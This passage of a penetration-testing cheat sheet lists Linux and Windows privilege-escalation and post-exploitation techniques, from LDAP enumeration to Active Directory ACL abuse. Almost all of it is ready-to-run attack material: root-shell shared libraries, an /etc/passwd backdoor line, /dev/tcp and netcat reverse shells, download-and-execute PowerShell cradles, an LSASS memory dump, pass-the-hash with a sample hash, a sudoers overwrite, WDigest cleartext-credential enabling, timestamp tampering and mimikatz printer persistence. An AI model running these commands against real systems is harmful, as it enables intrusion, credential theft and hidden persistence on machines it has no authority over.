$ (New-Object adsisearcher((New-Object adsi("LDAP://dc.<DOMAIN>.local","<DOMAIN>\<USERNAME>","<PASSWORD>")),"(info=*)")).FindAll() | %{ $_.Properties }
```

### ldapsearch

```c
$ ldapsearch -x -h <RHOST> -s base namingcontexts
$ ldapsearch -D <USERNAME> -H ldap://<RHOST> -w "<PASSWORD>" -b "CN=Users,DC=contoso,DC=local" | grep info
$ ldapsearch -x -b "dc=<DOMAIN>,dc=local" "*" -h <RHOST> | awk '/dn: / {print $2}'
$ ldapsearch -x -D "cn=admin,dc=<DOMAIN>,dc=local" -s sub "cn=*" -h <RHOST> | awk '/uid: /{print $2}' | nl
$ ldapsearch -D "cn=admin,dc=acme,dc=com" "(objectClass=*)" -w ldapadmin -h ldap.acme.com
$ ldapsearch -x -h <RHOST> -D "<USERNAME>"  -b "dc=<DOMAIN>,dc=local" "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd
$ ldapsearch -x -w <PASSWORD>
$ ldapsearch -H ldap://<DOMAIN> -b "DC=<DOMAIN>,DC=local" > <FILE>.txt
```

### LD\_PRELOAD

> <https://www.hackingarticles.in/linux-privilege-escalation-using-ld\\_preload/>

#### shell.c

```c
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
	unsetenv("LD_PRELOAD");
	setresuid(0,0,0);
	system("/bin/bash -p");
}
```

or

```c
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/sh");
}
```

#### Compiling

```c
$ gcc -o <SHARED_OBJECT>.so <FILE>.c -shared -FPIC -nostartfiles 
```

#### Privilege Escalation

```c
$ sudo LD_PRELOAD=/PATH/TO/SHARED_OBJECT/<SHARED_OBJECT>.so <BINARY>
```

### LD\_LIBRARY\_PATH

#### Get Information about Libraries

```c
$ ldd /PATH/TO/BINARY/<BINARY>
```

#### shell.c

```c
#include <stdio.h>
#include <stdlib.h>

static void hijack() __attribute__((constructor));

void hijack() {
	unsetenv("LD_LIBRARY_PATH");
	setresuid(0,0,0);
	system("/bin/bash -p");
}
```

#### Compiling

```c
$ gcc -o <LIBRARY>.so.<NUMBER> -shared -fPIC <FILE>.c
```

#### Privilege Escalation

```c
$ sudo LD_LIBRARY_PATH=/PATH/TO/LIBRARY/<LIBRARY>.so.<NUMBER> <BINARY>
```

### Linux

#### adduser.sh

```c
#!/bin/bash
echo '<USERNAME>:BP9vDdYHNP.Mk:0:0:root:/root:/bin/bash' >> /etc/passwd
```

#### capsh

```c
$ capsh --print
```

### Linux Wildcards

> <https://www.defensecode.com/public/DefenseCode\\_Unix\\_WildCards\\_Gone\\_Wild.txt>

With the command `touch -- --checkpoint=1` will be a file created. Why? Because the `--` behind the command `touch` is telling touch, that there's option to be wait for. Instead of an option, it creates a file, named `--checkpoint=1`.

```c
$ touch -- --checkpoint=1
```

or

```c
$ touch ./--checkpoint=1
```

So after creating the `--checkpoint=1` file, i created another file, which executes a shell script.

```c
$ touch -- '--checkpoint-action=exec=sh shell.sh'
```

or

```c
$ touch ./--checkpoint-action=exec=<FILE>
```

To delete a misconfigured file, put a `./` in front of it.

```c
$ rm ./'--checkpoint-action=exec=python script.sh'
```

### logrotten

> <https://github.com/whotwagner/logrotten>

#### Skeleton Payload

```c
if [ `id -u` -eq 0 ]; then ( /bin/sh -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1 ); fi
```

#### Syntax

**If "create"-option is set in logrotate.cfg**

```c
$ ./logrotten -p ./payloadfile /tmp/log/pwnme.log
```

**If "compress"-option is set in logrotate.cfg**

```c
$ ./logrotten -p ./payloadfile -c -s 4 /tmp/log/pwnme.log
```

### Lsass

#### Dump

```c
C:\> tasklist
C:\> rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 688 C:\Users\Administrator\Documents\lsass.dmp full
```

### Lua

#### Code Execution

```c
file = io.open("/root/.ssh/authorized_keys", "w")
file:write("ssh-rsa AAAAB3N--- snip ---YM5syQ==")
file:close()
```

### machinectl

```c
$ machinectl shell --uid=root
```

### Microsoft Windows

#### Common Commands

```c
C:\> tasklist /SVC
C:\> sc query
C:\> sc qc <SERVICE>
C:\> netsh firewall show state
C:\> schtasks /query /fo LIST /v
C:\> findstr /si password *.xml *.ini *.txt
C:\> dir /s *pass* == *cred* == *vnc* == *.config*
C:\> accesschk.exe -uws "Everyone" "C:\Program Files"
C:\> wmic qfe get Caption,Description,HotFixID,InstalledOn
C:\> driverquery.exe /v /fo csv | ConvertFrom-CSV | Select-Object 'Display Name', 'Start Mode', Path
```

#### Adding Users to Groups

```c
C:\> net user <USERNAME> <PASSWORD> /add /domain
C:\> net group "Exchange Windows Permissions" /add <USERNAME>
C:\> net localgroup "Remote Management Users" /add <USERNAME>
```

#### Enable Remote Desktop (RDP)

```c
C:\> reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
C:\> netsh advfirewall firewall set rule group="remote desktop" new enable=yes
```

or

```c
PS C:\> Set-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server' -Name "fDenyTSConnections" -Value 0;
PS C:\> Set-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -Name "UserAuthentication" -Value 1;
PS C:\> Enable-NetFirewallRule -DisplayGroup "Remote Desktop";
```

#### Hashes

> <https://medium.com/@petergombos/lm-ntlm-net-ntlmv2-oh-my-a9b235c58ed4>

> <https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html>

* LM Hashes are deprecated and so there are replaced by an empty string (aad3b435b51404eeaad3b435b51404ee).
* If a `Hash` starts with `31d6`, chances are pretty good, that there is no `Password` set for the user.

**LM**

* `Oldest` password storage used by `Microsoft Windows`
* If available, they can be obtained from `SAM` databases on a `Microsoft Windows` system or from the `NTDS` database of a `Domain Controller`
* When dumping `SAM/NTDS` databases, they are shown together within the `NTHash` before the colon
* Can be used for `Pass-The-Hash`

**Example**

```c
299BD128C1101FD6
```

**Algorithm**

1. Convert all `lower case` to `upper case`
2. Pad password to `14` characters with NULL characters
3. Split the password to two `7` character chunks
4. Create two `DES` keys from each `7` character chunk
5. DES `encrypt` the string "KGS!@#$%" with these two `chunks`
6. `Concatenate` the two DES encrypted strings. This is the LM hash.

**Cracking**

```c
$ john --format=lm <FILE>
$ hashcat -m 3000 -a 3 <FILE>
```

**NTHash (NTLM)**

* The way how passwords are stored on `modern` `Microsoft Windows` systems
* Can be optained by dumping the `SAM` database or using `mimikatz`
* They are also stored in the `NTDS` file on `Domain Cotnrollers`
* Can be used for `Pass-The-Hash`

**Example**

```c
B4B9B02E6F09A9BD760F388B67351E2B
```

**Algorithm**

```c
MD4(UTF-16-LE(password))
```

**Cracking**

```c
$ john --format=nt <FILE>
$ hashcat -m 1000 -a 3 <FILE>
```

**Net-NTLMv1 (NTLMv1)**

* `NTLM` protocol uses the `NTHash` in `Challenge-Response` between a `server` and a `client`
* The `v1` of the protocol uses both, the `NT` hash and the `LM` hash, depending on configuration and what is available.
* Can be obtained by using `Responder`
* Values for cracking are `K1`, `K2` or `K3` from the algorithm
* Version 1 is `deprecated` but still used in some old systems on the network
* Can be used for `Relaying`

**Example**

```c
u4-netntlm::kNS:338d08f8e26de93300000000000000000000000000000000:9526fb8c23a90751cdd619b6cea564742e1e4bf33006ba41:cb8086049ec4736c
```

**Algorithm**

```c
C = 8-byte server challenge, random
K1 | K2 | K3 = LM/NT-hash | 5-bytes-0
response = DES(K1,C) | DES(K2,C) | DES(K3,C)
```

**Cracking**

```c
$ john --format=netntlm <FILE>
$ hashcat -m 5500 -a 3 <FILE>
```

**Net-NTLMv2 (NTLMv2)**

* New and improved version of the `NTLM` protocol
* Harder to crack
* Same concept as `NTLMv1`, only with a different algorithm and response sent to the server
* Can also be captured by using `Responder`
* Default in Microsoft Windows since `Microsoft Windows 2000`
* Can be used for `Relaying`

**Example**

```c
admin::N46iSNekpT:08ca45b7d7ea58ee:88dcbe4446168966a153a0064958dac6:5c7830315c7830310000000000000b45c67103d07d7b95acd12ffa11230e0000000052920b85f78d013c31cdb3b92f5d765c783030
```

**Algorithm**

```c
SC = 8-byte server challenge, random
CC = 8-byte client challenge, random
CC* = (X, time, CC2, domain name)
v2-Hash = HMAC-MD5(NT-Hash, user name, domain name)
LMv2 = HMAC-MD5(v2-Hash, SC, CC)
NTv2 = HMAC-MD5(v2-Hash, SC, CC*)
response = LMv2 | CC | NTv2 | CC*
```

**Cracking**

```c
$ john --format=netntlmv2 <FILE>
$ hashcat -m 5600 -a 3 <FILE>
```

#### Privileges and Permissions

**AlwaysInstallElevated**

```c
C:\> reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
C:\> reg query HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer
C:\> reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer
C:\> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer
```

```c
$ msfvenom -p windows/meterpreter/reverse_tcp lhost=<LHOST> lport=<LPORT> –f  msi > <FILE>.msi
```

```c
C:\> msiexec /quiet /qn /i <FILE>.msi
```

#### Registry Handling

**Enable Colored Output**

```c
C:\> reg add HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1
```

Then open a new Terminal Window.

**Check for Auto Run Programs**

```c
C:\> reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
```

**Get Registry Key Information**

```c
C:\> req query <REGISTRY_KEY>
```

**Modify Registry Key**

```c
C:\> reg add <REGISTRY_KEY> /v <VALUE_TO_MODIFY> /t REG_EXPAND_SZ /d C:\PATH\TO\FILE\<FILE>.exe /f
```

**Search the Registry for Passwords**

```c
C:\> req query HKLM /f password /t REG_SZ /s
C:\> req query HKCU /f password /t REG_SZ /s
```

#### Searching for Credentials

**Unattended Windows Installations**

**Potential Files containing Passwords**

```c
C:\Unattend.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\system32\sysprep.inf
C:\Windows\system32\sysprep\sysprep.xml
```

**Search for Passwords**

```c
C:\> dir .s *pass* == *.config
C:\> findstr /si password *.xml *.ini *.txt
```

**PowerShell History**

```c
C:\> type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
```

**Saved Windows Credentials**

```c
C:\> cmdkey /list
C:\> runas /savecred /user:<USERNAME> cmd.exe
```

**IIS Configuration**

```c
C:\> type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | findstr connectionString
```

**PuTTY**

```c
C:\> reg query HKEY_CURRENT_USER\Software\<USERNAME>\PuTTY\Sessions\ /f "Proxy" /s
```

#### Service Handling

```c
C:\> sc.exe create <SERVICE_NAME>
C:\> sc start <SERVICE_NAME>
C:\> sc qc <SERVICE_NAME>
```

#### Tasks & Services

**Scheduled Tasks**

```c
C:\> schtasks
C:\> schtasks /query /tn <TASK> /fo list /v
C:\> schtasks /run /tn <TASK>
PS C:\> Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State
```

**Unquoted Service Paths**

Search for `Unquoted Service Paths` by using `sc qc`.

```c
C:\> sc qc
C:\> sc qc WindowsScheduler
C:\> sc stop WindowsScheduler
C:\> sc start WindowsScheduler
```

```c
C:\> icacls <PROGRAM>.exe
C:\> icacls C:\PROGRA~2\SYSTEM~1\<SERVICE>.exe
C:\> icacls C:\PROGRA~2\SYSTEM~1\<SERVICE>.exe /grant Everyone:F
```

**Insecure Service Permissions**

```c
C:\> accesschk64.exe -qlc <SERVICE>
C:\> icacls C:\Users\<USERNAME>\<FILE>.exe /grant Everyone:F
C:\> sc config <SERVICE> binPath= "C:\Users\<USERNAME>\<FILE>.exe" obj= LocalSystem
C:\> sc stop <SERVICE>
C:\> sc start <SERVICE>
```

**SeBackup and SeRestore Privilege**

**Backup SAM and SYSTEM Hashes**

```c
C:\> reg save hklm\system C:\Users\<USERNAME>\system.hive
C:\> reg save hklm\sam C:\Users\<USERNAME>\sam.hive
```

**Dumping Hashes**

```c
$ secretsdump.py -sam sam.hive -system system.hive LOCAL
```

**Pass the Hash**

```c
$ psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:13a04cdcf3f7ec41264e568127c5ca94 administrator@<RHOST>
```

**SeTakeOwnership Privilege**

```c
C:\> takeown /f C:\Windows\System32\Utilman.exe
```

```c
C:\> icacls C:\Windows\System32\Utilman.exe /grant Everyone:F
```

```c
C:\Windows\System32\> copy cmd.exe utilman.exe
```

Click the `Ease of Access` button on the logon screen to get a shell with `NT Authority\System` privileges.

**SeImpersonate and SeAssignPrimaryToken Privilege**

> <https://github.com/antonioCoco/RogueWinRM>

```c
C:\> .\RogueWinRM.exe -p "C:\> .\nc64.exe" -a "-e cmd.exe <LHOST> <LPORT>"
```

#### WMIC

```c
C:\> wmic product get name,version,vendor
```

### Microsoft Windows Defender

#### Check Whitelisted Paths

```c
PS C:\> reg query "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths"
```

#### Malicious Test String

```c
PS C:\> $str = 'amsiinitfailed'
```

### Minimalistic Offensive Security Tools

> <https://github.com/InfosecMatter/Minimalistic-offensive-security-tools>

#### port-scan-tcp.ps1

```c
PS C:\> IEX(New-Object Net.WebClient).DownloadString('http://<RHOST>/port-scan-tcp.ps1')
```

### PassTheCert

> <https://offsec.almond.consulting/authenticating-with-certificates-when-pkinit-is-not-supported.html>

> <https://github.com/AlmondOffSec/PassTheCert/tree/main/Python>

```c
$ certipy-ad cert -pfx <CERTIFICATE>.pfx -nokey -out <CERTIFICATE>.crt
$ certipy-ad cert -pfx <CERTIFICATE>.pfx -nocert -out <CERTIFICATE>.key
$ python3 passthecert.py -domain '<DOMAIN>' -dc-host '<DOMAIN>' -action 'modify_user' -target '<USERNAME>' -new-pass '<PASSWORD>' -crt ./<CERTIFICATE>.crt -key ./<CERTIFICATE>.key
$ evil-winrm -i '<RHOST>' -u '<USERNAME>' -p '<PASSWORD>'
```

### Path Variable Hijacking

#### Finding accessible SUID Files

```c
$ find / -perm -u=s -type f 2>/dev/null
```

#### Find writeable Paths

```c
$ find / -writable 2>/dev/null | cut -d "/" -f 2,3 | grep -v proc | sort -u
```

#### Add current Directory

```c
$ export PATH=$(pwd):$PATH
```

#### Binary File

```c
$ cd /tmp
$ vi <FILE>
$ chmod +x ./<FILE>
$ PATH=$(pwd):$PATH <SUID_FILE>
```

### pika

#### Remote Code Execution (RCE)

```c
#!/usr/bin/env python

import pika

credentials = pika.PlainCredentials('<USERNAME>', '<PASSWORD>')
parameters = pika.ConnectionParameters('<LHOST>',5672,'/',credentials)
connection = pika.BlockingConnection(parameters)
channel = connection.channel()
channel.basic_publish(exchange='', routing_key='plugin_data', body='http://127.0.0.1:9001/<SCRIPT>')
connection.close()
```

### Ping Sweep

#### On a Linux Operating System

```c
$ for ip in {1..254}; do (ping -c 1 <XXX.XXX.XXX>.${ip} | grep "bytes from" | grep -v "Unreachable" &); done;
```

#### On a Windows Operating System

```c
PS C:\> 1..255 | ForEach-Object { $ip = "<XXX.XXX.XXX>.$_"; if (Test-Connection -ComputerName $ip -Count 1 -Quiet) { $ip } }
```

#### With Meterpreter

```c
meterpreter > (for /L %a IN (1,1,254) DO ping /n 1 /w 1 <XXX.XXX.XXX>.%a) | find "Reply"
```

### PKINITtools

```c
$ python3 gettgtpkinit.py -cert-pfx <USERNAME>.pfx -dc-ip <RHOST> <DOMAIN>/<USERNAME> <USERNAME>.ccache
$ export KRB5CCNAME=<USERNAME>.ccache
$ python3 getnthash.py <DOMAIN>/<USERNAME> -key 6617cde50b7ee63faeb6790e84981c746efa66f68a1cc3a394bbd27dceaf0554
```

### plotting

Exploit race condition on linux by swapping file paths between 2 files very quickly (normal file, symlink to root owned file, swap, swap ,swap).

```c
#define _GNU_SOURCE
#include <stdio.h>
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <linux/fs.h>

int main(int argc, char *argv[]) {
  while (1) {
    syscall(SYS_renameat2, AT_FDCWD, argv[1], AT_FDCWD, argv[2], RENAME_EXCHANGE);
  }
  return 0;
}
```

### Port Scanning

#### On a Linux Operating System

```c
$ nc -zv 127.0.0.1 1-65535 | grep succeeded
```

```c
$ for port in {1..65535}; do echo > /dev/tcp/<RHOST>/$port && echo "$port open"; done 2>/dev/null
```

#### On a Windows Operating System

```c
PS C:\> 1..65535 | % {echo ((new-object Net.Sockets.TcpClient).Connect("<RHOST>",$_)) "$_ port open"} 2>$null
```

### PoshADCS

> <https://github.com/cfalta/PoshADCS/blob/master/ADCS.ps1>

```c
PS C:\> curl http://<LHOST>/ADCS.ps1 | iex
PS C:\> Get-SmartCardCertificate -Identity Administrator -TemplateName Web -NoSmartCard -Verbose
PS C:\> gci cert:\currentuser\my -recurse
```

### powercat

> <https://github.com/besimorhino/powercat>

```c
PS C:\> powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://<LHOST>/powercat.ps1');powercat -c <LHOST> -p <LPORT> -e cmd"
```

#### File Transfer

```c
$ impacket-smbserver local . -smb2support
```

```c
PS C:\> Import-Module .\powercat.ps1
PS C:\> powercat -c <LHOST> -p 445 -i C:\PATH\TO\FILE\<FILE>
```

### Powermad

```c
PS C:\> Import-Module ./Powermad.ps1
PS C:\> $secureString = convertto-securestring "<PASSWORD>" -asplaintext -force
PS C:\> New-MachineAccount -MachineAccount <NAME> -Domain <DOMAIN> -DomainController <DOMAIN> -Password $secureString
```

### PowerShell Constrained Language Mode (CLM)

```c
PS C:\> Get-ApplockerPolicy -Effective -xml
PS C:\> Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
```

#### Bypass Test

```c
PS C:\> $a = Get-ApplockerPolicy -effective
PS C:\> $a.rulecollections
```

#### Bypass

```c
PS C:\> $ExecutionContext.SessionState.LanguageMode
PS C:\> IEX(New-Object Net.WebClient).DownloadString('http://<RHOST>/<FILE>.ps1')
```

```c
PS C:\> powershell -version 2
```

**Example**

```c
PS C:\> IEX(New-Object Net.WebClient).DownloadString('http://<RHOST>/Invoke-Rubeus.ps1'); Invoke-Rubeus.ps1
```

### PowerSploit

> <https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1>

#### Import

```c
PS C:\> Import-Module .\PowerView.ps1
```

or

```c
PS C:\> iex(new-object net.webclient).downloadstring('http://<LHOST>/PowerView.ps1')
```

#### Set Credentials

```c
PS C:\> $SecPass = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force 
PS C:\> $cred = New-Object System.Management.Automation.PSCredential('<DOMAIN>\LDAP', $SecPass)
```

#### Example

```c
PS C:\> Get-DomainUser -Credential $cred -DomainController dc.<DOMAIN>
```

### PowerView

> <https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1>

```c
PS C:\> curl http://<LHOST>/PowerView.ps1 | iex
```

### PRET

> <https://github.com/RUB-NDS/PRET>

```c
$ ./pret.py
$ ./pret.py <printer fqdn> ps    // pjl
```

```c
<RHOST>:/> ls
<RHOST>:/> cd
<RHOST>:/> get
<RHOST>:/> nvram dump
```

### procdump

```c
PS C:\> .\procdump64.exe -accepteula -ma <PID>
PS C:\> type <FILE>.dmp | Select-String "username="
```

### pspy

> <https://github.com/DominicBreuker/pspy>

```c
$ pspy64 -f
$ pspy64 -pf -i 1000
```

### pth-toolkit

> <https://github.com/byt3bl33d3r/pth-toolkit>

```c
$ pth-smbclient --user=<USERNAME> --pw-nt-hash -m smb3 \\\\<RHOST>\\<USERNAME> <HASH>
```

### pwncat

> <https://github.com/calebstewart/pwncat>

> <https://pwncat.readthedocs.io/en/latest/usage.html>

#### Common Commands

```c
(local) pwncat$ back    // get back to shell
Ctrl+d                  // get back to pwncat shell
```

```c
$ pwncat-cs -lp <LPORT>
(local) pwncat$ download /PATH/TO/FILE/<FILE> .
(local) pwncat$ upload /PATH/TO/FILE/<FILE> /PATH/TO/FILE/<FILE>
```

### Python

#### System Shell

```c
$ python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
```

#### Python Library Hijacking

> <https://rastating.github.io/privilege-escalation-via-python-library-hijacking/>

> <https://medium.com/@klockw3rk/privilege-escalation-hijacking-python-library-2a0e92a45ca7>

#### Get the current Path

```c
$ python3 -c 'import sys;print(sys.path)'
```

#### remoteshell.py

```c
import os
os.system("nc -lnvp <LPORT> -e /bin/bash")
```

#### Include Path

```c
$ sudo -E PYTHONPATH=$(pwd) /opt/scripts/admin_tasks.sh 6
```

### rpcclient

#### LDAP

```c
$ rpcclient -U "" <RHOST>
```

**Queries**

```c
srvinfo
netshareenum
netshareenumall
netsharegetinfo
netfileenum
netsessenum
netdiskenum
netconnenum
getanydcname
getdcname
dsr_getdcname
dsr_getdcnameex
dsr_getdcnameex2
dsr_getsitename
enumdomusers
enumdata
enumjobs
enumports
enumprivs
queryuser <USERNAME>
```

### Rubeus

> <https://github.com/GhostPack/Rubeus>

#### Overpass the Hash

```c
PS C:\> Rubeus.exe kerberoast /user:<USERNAME>
```

#### Pass the Hash

```c
PS C:\> .\Rubeus.exe asktgt /user:Administrator /certificate:7F052EB0D5D122CEF162FAE8233D6A0ED73ADA2E /getcredentials
```

#### .NET Reflection

**Example**

```c
$ base64 Rubeus.exe -w0 > <FILE>.txt
```

```c
PS C:\> $RubeusAssembly = [System.Reflection.Assembly]::Load([Convert]::FromBase64String((new-object net.webclient).downloadstring('http://<RHOST>/<FILE>.txt')))
```

```c
PS C:\> [Rubeus.Program]::MainString("kerberoast /creduser:<DOMAIN>\<USERNAME> /credpassword:<PASSWORD>")
```

### RunasCs

> <https://github.com/antonioCoco/RunasCs>

```c
C:\> ./RunasCs.exe -l 3 -d <DOMAIN> "<USERNAME>" '<PASSWORD>' 'C:\Users\<USERNAME>\Downloads\<FILE>.exe'
C:\> ./RunasCs.exe -d <DOMAIN> "<USERNAME>" '<PASSWORD>' cmd.exe -r <LHOST>:<LPORT>
```

### SeBackupPrivilege Privilege Escalation (diskshadow)

> <https://github.com/giuliano108/SeBackupPrivilege/tree/master/SeBackupPrivilegeCmdLets/bin/Debug>

#### Script for PowerShell Environment

```c
SET CONTEXT PERSISTENT NOWRITERSp
add volume c: alias foobarp
createp
expose %foobar% z:p
```

```c
PS C:\> diskshadow /s <FILE>.txt
```

#### Copy ntds.dit

```c
PS C:\> Copy-FileSebackupPrivilege z:\Windows\NTDS\ntds.dit C:\temp\ndts.dit
```

#### Export System Registry Value

```c
PS C:\> reg save HKLM\SYSTEM c:\temp\system
```

Download `ndts.dit` and system and get the hashes from `secretsdump.py` of the impacket-suite.

### setcap

```c
$ setcap cap_setgid,cap_setuid+eip <FILE>
```

### SharpHound

> <https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.exe>

```c
PS C:\> .\SharpHound.exe --CollectionMethod All
```

### Shell Upgrade

```c
$ python -c 'import pty;pty.spawn("/bin/bash")'
```

or

```c
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
```

```c
$ Ctrl + z
$ stty raw -echo
fg
Enter
Enter
$ export XTERM=xterm
```

Alternatively:

```c
$ script -q /dev/null -c bash
$ /usr/bin/script -qc /bin/bash /dev/null
```

#### Oneliner

```c
$ stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset;
```

#### Fixing Staircase Effect

```c
$ env reset
```

or

```c
$ stty onlcr
```

### Sherlock

> <https://github.com/rasta-mouse/Sherlock>

#### Config

Add `Find-AllVulns` at the end of the script to run it as soon as it get's loaded.

```c
            10586 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le 19 ] }
            14393 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le 446 ] }
            default { $VulnStatus = "Not Vulnerable" }

        }

    Set-ExploitTable $MSBulletin $VulnStatus

}
Find-AllVulns

$ IEX(New-Object Net.webclient).downloadString('http://<LHOST>/Sherlock.ps1')
```

### systemctl

#### Malicious Service Privilege Escalation

**Payload**

```c
[Unit]
Description=Example Service

[Service]
Type=simple
ExecStart=chmod +s /bin/bash
Restart=always

[Install]
WantedBy=multi-user.target

```

**Installation**

```c
$ echo '[Unit]
Description=Example Service

[Service]
Type=simple
ExecStart=chmod +s /bin/bash
Restart=always

[Install]
WantedBy=multi-user.target' > /etc/systemd/system/<SERVICE>.service
```

**Execution**

```c
$ sudo systemctl restart <SERVICE>
```

### Time Stomping

```c
$dateTime = New-Object System.DateTime(1999,12,26)
$regKey = [Microsoft.Win32.Registry]::LocalMachine.OpenSubKey("SYSTEM\CurrentControlSet\Services\helpsvc",$true)[RegRoutines.NativeMethods]::SetRegistryKeyDateTime($regKey, $dateTime)
```

### Universal Privilege Escalation and Persistence Printer

```c
$printerName     = 'Pentest Lab Printer'
$system32        = $env:systemroot + '\system32'
$drivers         = $system32 + '\spool\drivers'
$RegStartPrinter = 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Print\Printers\' + $printerName
```

```c
Copy-Item -Force -Path ($system32 + '\mscms.dll')             -Destination ($system32 + '\mimispool.dll')
Copy-Item -Force -Path '.\mimikatz_trunk\x64\mimispool.dll'   -Destination ($drivers  + '\x64\3\mimispool.dll')
Copy-Item -Force -Path '.\mimikatz_trunk\win32\mimispool.dll' -Destination ($drivers  + '\W32X86\3\mimispool.dll')
```

```c
Add-PrinterDriver -Name       'Generic / Text Only'
Add-Printer       -DriverName 'Generic / Text Only' -Name $printerName -PortName 'FILE:' -Shared
```

```c
New-Item         -Path ($RegStartPrinter + '\CopyFiles')        | Out-Null
```

```c
New-Item         -Path ($RegStartPrinter + '\CopyFiles\Kiwi')   | Out-Null
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Kiwi')   -Name 'Directory' -PropertyType 'String'      -Value 'x64\3'           | Out-Null
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Kiwi')   -Name 'Files'     -PropertyType 'MultiString' -Value ('mimispool.dll') | Out-Null
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Kiwi')   -Name 'Module'    -PropertyType 'String'      -Value 'mscms.dll'       | Out-Null
```

```c
New-Item         -Path ($RegStartPrinter + '\CopyFiles\Litchi') | Out-Null
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Litchi') -Name 'Directory' -PropertyType 'String'      -Value 'W32X86\3'        | Out-Null
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Litchi') -Name 'Files'     -PropertyType 'MultiString' -Value ('mimispool.dll') | Out-Null
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Litchi') -Name 'Module'    -PropertyType 'String'      -Value 'mscms.dll'       | Out-Null
```

```c
New-Item         -Path ($RegStartPrinter + '\CopyFiles\Mango')  | Out-Null
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Mango')  -Name 'Directory' -PropertyType 'String'      -Value $null             | Out-Null
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Mango')  -Name 'Files'     -PropertyType 'MultiString' -Value $null             | Out-Null
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Mango')  -Name 'Module'    -PropertyType 'String'      -Value 'mimispool.dll'   | Out-Null
```

### User Group Exploitation

> <https://wixnic.github.io/linux-privesc-groups/>

> <https://www.hackingarticles.in/multiple-ways-to-get-root-through-writable-file/>

#### Possibilities

```c
- Edit /etc/passwd    // copy it to /tmp to edit
- Add new SSH Key to /root/
```

#### Find modifyable Files

```c
$ find / -group root -perm -g=w ! -type l 2>/dev/null | grep -v 'proc\|sys' | xargs ls -l
```

#### Option 1

```c
#!/usr/bin/env python
import os
import sys
try:
       os.system('cp /bin/sh /tmp/sh')
       os.system('chmod u+s /tmp/sh')
except:
       sys.exit()
```

#### Option 2

```c
#!/usr/bin/env python
import os
import sys
try:
       os.system('echo "$USER ALL=(ALL) NOPASSWD: ALL" > /etc/sudoers')
except:
       sys.exit()
```

### VSS

> <https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/active-directory-security-groups#bkmk-serveroperators>

#### Abusing Server Operator Group Membership to get a Reverse Shell

```c
$ sc.exe config vss binPath="C:\Users\svc-printer\Documents\nc.exe -e cmd.exe <LHOST> <LPORT>"
$ sc.exe stop vss
$ sc.exe start vss
```

### WDigest

#### Store Cleartext Credentials Cleartext in LSASS

```c
PS C:\> Set-ItemProperty -Force -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest' -Name "UseLogonCredential" -Value '1'"
```

### Whisker

```c
C:\> .\Whisker.exe add /target:<USERNAME>
```

### Windows-Exploit-Suggester

> <https://github.com/AonCyberLabs/Windows-Exploit-Suggester>

#### Prerequisites

```c
$ python -m pip install xlrd
```

#### Update

```c
$ ./windows-exploit-suggester.py --update
```

#### Usage

```c
$ ./windows-exploit-suggester.py --database 2020-07-15-mssb.xls --systeminfo sysinfo
```

### winexe

```c
$ winexe -U '<USERNAME%PASSWORD>' //<RHOST> cmd.exe
$ winexe -U '<USERNAME%PASSWORD>' --system //<RHOST> cmd.exe
```

### writeDACL

> <https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/>

#### Usage

```c
PS C:\> $SecPassword = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force
PS C:\> $Cred = New-Object System.Management.Automation.PSCredential('<DOMAIN>\<USERNAME>', $SecPassword)
PS C:\> Add-ObjectACL -PrincipalIdentity <USERNAME> -Credential $Cred -Rights DCSync
```